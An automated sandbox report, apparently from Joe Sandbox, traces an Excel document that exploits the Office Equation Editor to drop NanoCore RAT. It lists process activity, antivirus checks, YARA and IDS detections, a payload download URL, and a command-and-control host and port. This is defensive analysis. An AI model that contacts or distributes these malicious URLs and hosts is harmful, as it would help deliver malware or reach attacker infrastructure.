Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'

Source: sys30.exe, 00000007.00000002.688965691.00000000012D0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: sys30.exe, 00000007.00000002.688965691.00000000012D0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: sys30.exe, 00000007.00000002.688965691.00000000012D0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe

Code function: 9_2_0062C010 GetSystemTimes,

9_2_0062C010

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

Remote Access Functionality:

Detected Nanocore Rat

Source: sys30.exe, 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp

String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.168.36	www.google.com	United States	15169	GOOGLEUS	false
13.238.159.178	unknown	United States	16509	AMAZON-02US	true
194.5.98.103	e-businessloader.mywire.org	Netherlands	208476	DANILENKODE	false

Contacted Domains

Name	IP	Active
www.google.com	172.217.168.36	true
e-businessloader.mywire.org	194.5.98.103	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://13.238.159.178/truth/vbc.exe	true	Avira URL Cloud: safe	unknown
https://www.google.com/	false		high

AV Detection:

Multi AV Scanner detection for submitted file

Source: Enclosed.xlsx

ReversingLabs: Detection: 29%

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\sys30s.exe

Metadefender: Detection: 13%

Perma Link

Yara detected Nanocore RAT

Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 9.2.sys30.exe.560000.3.unpack	Avira: Label: TR/NanoCore.fadte
Source: 9.2.sys30.exe.70000.0.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49170 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: www.google.com

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	6_2_0038DB3F
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	6_2_0038BC70
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 00384610h	6_2_00383D88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then mov dword ptr [ebp-40h], 00000001h	7_2_0038D750
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	7_2_0038BC70
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then jmp 00384610h	7_2_00383D88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then jmp 00C29F46h	7_2_00C29E08
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then jmp 00C2B4CCh	7_2_00C2B338
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then jmp 00C29F46h	7_2_00C29DF9
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then jmp 00C2B4CCh	7_2_00C2B328
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	9_2_0062F300
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	9_2_0062F2FD
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_00629A02
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001D0797h	11_2_001D0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001D0797h	11_2_001D0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001C0797h	12_2_001C0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001C0797h	12_2_001C0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00330797h	13_2_00330560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00330797h	13_2_00330550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001F0797h	14_2_001F0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001F0797h	14_2_001F0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00210797h	15_2_00210560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00210797h	15_2_00210550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 003A0797h	16_2_003A0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 003A0797h	16_2_003A0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002E0797h	17_2_002E0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002E0797h	17_2_002E0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001E0797h	18_2_001E0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001E0797h	18_2_001E0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001D0797h	19_2_001D0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 001D0797h	19_2_001D0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00690797h	20_2_00690560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00690797h	20_2_00690550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00450797h	21_2_00450560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00450797h	21_2_00450550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00250797h	22_2_00250560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00250797h	22_2_00250550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 003F0797h	23_2_003F0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 003F0797h	23_2_003F0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00190797h	24_2_00190560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00190797h	24_2_00190550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002F0797h	25_2_002F0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002F0797h	25_2_002F0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002D0797h	26_2_002D0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002D0797h	26_2_002D0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00280797h	27_2_00280560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00280797h	27_2_00280550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00320797h	28_2_00320560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00320797h	28_2_00320550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002C0797h	29_2_002C0560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 002C0797h	29_2_002C0550
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00220797h	30_2_00220560
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Code function: 4x nop then jmp 00220797h	30_2_00220550

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 13.238.159.178:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 172.217.168.36:443

Source: excel.exe

Memory has grown: Private usage: 4MB later: 68MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49181 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49182 -> 194.5.98.103:5230
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49183 -> 194.5.98.103:5230

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive

Downloads executable code via HTTP

Source: global traffic

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.22:49170 version: TLS 1.0

Uses a known web browser user agent for HTTP communication

Source: global traffic

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49172 -> 194.5.98.103:5230

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
Source: unknown	TCP traffic detected without corresponding DNS query: 13.238.159.178
